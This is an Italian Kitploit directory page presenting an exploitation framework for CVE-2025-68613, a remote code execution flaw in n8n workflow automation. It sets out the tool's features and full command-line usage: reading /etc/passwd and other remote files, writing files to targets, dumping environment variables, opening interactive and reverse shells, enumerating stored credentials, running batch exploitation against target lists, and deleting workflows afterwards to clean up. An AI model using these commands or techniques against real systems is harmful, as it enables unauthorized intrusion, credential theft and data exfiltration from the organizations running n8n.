Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Esecuzione remota di codice nell'automazione dei workflow | Kitploit
Strumenti/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitPenetration TestingCommand and ControlApprendimento e FormazioneRed Teaming
Strumento di Accesso Remoto
Sviluppo Payload
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Esecuzione remota di codice nell'automazione dei workflow

Vedi Repository
53159 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

n8n God Mode Ultimate - Scanner e Framework di Exploitation CVE-2025-68613

n8n God Mode Ultimate

Strumento avanzato di scansione RCE ed exploitation per l'automazione dei flussi di lavoro n8n

Python Version License CVE CVSS Score


🎯 Panoramica

n8n God Mode Ultimate è un framework completo di test di sicurezza progettato per rilevare e validare la CVE-2025-68613 nelle piattaforme di automazione dei flussi di lavoro n8n. Questa vulnerabilità critica di Remote Code Execution (RCE) colpisce le versioni di n8n tramite l'iniezione di espressioni nei contesti di esecuzione dei flussi di lavoro.

Dettagli CVE-2025-68613

  • Punteggio CVSS: 10.0 (Critico)
  • Vettore di Attacco: Rete
  • Complessità dell'Attacco: Bassa
  • Privilegi Richiesti: Bassi (credenziali valide)
  • Interazione dell'Utente: Nessuna
  • Tipo di Vulnerabilità: Iniezione di Espressioni → Remote Code Execution

Versioni interessate:

  • n8n >= 0.211.0 e < 1.120.4
  • n8n >= 1.121.0 e < 1.121.1

Versioni patchate:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Funzionalità

🔍 Rilevamento e Scansione

  • Rilevamento Intelligente della Versione - Estrae la versione di n8n dai metadati della pagina di accesso
  • Scansione Batch - Scansione concorrente multi-thread dei target con monitoraggio dell'avanzamento
  • Modalità di Scansione Multiple:
    • --detect - Solo rilevamento della versione (il più veloce, non intrusivo)
    • --safe - Verifica sicura della vulnerabilità senza exploitation
    • --poc - Validazione proof-of-concept della RCE
    • --exploit - Modalità di exploitation completa

💣 Capacità di Exploitation

  • 4 Tecniche di Exploitation:
    1. Trigger Programmato - Flusso di lavoro ad esecuzione automatica (il più affidabile)
    2. Trigger Webhook - Esecuzione attivata via HTTP
    3. Code Node - Accesso diretto a child_process
    4. Iniezione di Espressioni - Esecuzione manuale di espressioni

🎮 Funzionalità God Mode

  • Shell Interattiva - Shell remota completa con cronologia dei comandi
  • Operazioni sui File:
    • read <file> - Legge file remoti
    • write <file> <content> - Scrive file sul target
  • Estrazione dell'Ambiente - Scarica tutte le variabili d'ambiente
  • Informazioni di Sistema - Dettagli del sistema operativo, configurazione di rete, informazioni sui processi
  • Reverse Shell - Generazione opzionale del payload di reverse shell
  • Cronologia dei Comandi - Tracciamento della cronologia integrato

📊 Funzionalità Avanzate

  • Enumerazione delle Credenziali - Estrae le credenziali memorizzate tramite API
  • Dump dei Flussi di Lavoro - Esporta tutti i flussi di lavoro con i metadati
  • Estrazione della Configurazione - Dump completo della configurazione di sistema
  • Enumerazione degli Utenti - Elenca tutti gli utenti n8n
  • Analisi dei Log di Esecuzione - Analizza gli output dei comandi dalle esecuzioni dei flussi di lavoro
  • Pulizia Automatica - Eliminazione opzionale dei flussi di lavoro dopo l'esecuzione

🚀 Installazione

Prerequisiti

# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

Installare le Dipendenze

# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

Requisiti

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Utilizzo

Utilizzo di Base

# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

Operazioni God Mode

# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Scansione Batch

# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

Formato di targets.txt:

http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Comandi della Shell Interattiva

Una volta in modalità shell (--shell):

n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ Opzioni della Riga di Comando

Opzioni del Target

-u, --url URL             URL del target n8n
-l, --list FILE           File contenente gli URL dei target
-t, --threads NUM         Numero di thread per la scansione batch (default: 10)

Autenticazione

-e, --email EMAIL         Email utente n8n
-p, --password PASS       Password utente n8n

Modalità di Scansione

--detect                  Solo rilevamento della versione (il più veloce)
--safe                    Verifica sicura senza exploitation
--poc                     Proof-of-concept della RCE
--exploit                 Modalità di exploitation completa

God Mode

--god                     Abilita la god mode
--cmd COMMAND             Esegue un singolo comando
--read-file PATH          Legge un file remoto
--write-file PATH         Scrive un file remoto
--content DATA            Contenuto per l'operazione di scrittura
--dump-env                Estrae tutte le variabili d'ambiente
--shell                   Modalità shell interattiva
--revshell HOST:PORT      Payload di reverse shell

Opzioni di Exploitation

--mode MODE               Modalità di exploit: schedule|webhook|code|expression (default: schedule)
--timeout SEC             Timeout del comando in secondi (default: 30)
--cleanup                 Elimina i flussi di lavoro dopo l'esecuzione
-k, --insecure           Disabilita la verifica SSL
-v, --verbose            Output verboso
-q, --quiet              Output minimale

🔬 Dettagli Tecnici

Metodologia di Exploitation

1. Trigger Programmato (Consigliato)

Crea un flusso di lavoro con un trigger programmato che si esegue automaticamente ogni 3 secondi. Il metodo più affidabile.

Scarica lo strumento